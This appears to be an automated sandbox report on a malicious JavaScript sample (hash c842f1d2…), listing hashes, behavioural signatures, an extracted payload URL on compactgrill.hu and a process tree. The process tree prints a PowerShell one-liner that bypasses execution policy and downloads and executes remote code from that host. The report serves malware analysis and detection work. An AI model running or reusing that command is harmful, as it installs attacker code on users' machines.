Analysis
-
max time kernel
119s -
max time network
123s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
05-03-2024 02:45
Static task
static1
Behavioral task
behavioral1
Sample
c842f1d233e8f298aa3ee7d7b6e8e890474f9acf7ec18b4da07e771d3be323f4.js
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
c842f1d233e8f298aa3ee7d7b6e8e890474f9acf7ec18b4da07e771d3be323f4.js
Resource
win10v2004-20240226-en
General
-
Target
c842f1d233e8f298aa3ee7d7b6e8e890474f9acf7ec18b4da07e771d3be323f4.js
-
Size
64KB
-
MD5
f6348f862b8f28e11adbf34af26b6159
-
SHA1
e974cab2e791d8d9d403ec4bac9a03e3e936392f
-
SHA256
c842f1d233e8f298aa3ee7d7b6e8e890474f9acf7ec18b4da07e771d3be323f4
-
SHA512
9cdb49496c9ede1f275df93df89476cd6de424419058d6a2a3e0db22a98d6248ce9cba180927723bc22beaeb82b733c59f5ade8d38b5773536efdddb0bd745bd
-
SSDEEP
1536:xz+pSx9UjeO+rANwbKkpddIVEZDZ/yMl+QQiZkkBLAoEUETvSvKCHCCD5V3KxFEC:AK9UjeO+rAqbKkpddIVEZDZ/yMl+QQiY
Malware Config
Extracted
https://compactgrill.hu/care.txt
Signatures
-
Blocklisted process makes network request 2 IoCs
flow pid Process 3 2940 powershell.exe 4 2940 powershell.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2940 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2940 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2172 wrote to memory of 2940 2172 wscript.exe 28 PID 2172 wrote to memory of 2940 2172 wscript.exe 28 PID 2172 wrote to memory of 2940 2172 wscript.exe 28
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\c842f1d233e8f298aa3ee7d7b6e8e890474f9acf7ec18b4da07e771d3be323f4.js1⤵
- Suspicious use of WriteProcessMemory
PID:2172 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -Command "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12; Invoke-Expression (New-Object Net.WebClient).DownloadString('https://compactgrill.hu/care.txt')"2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2940
-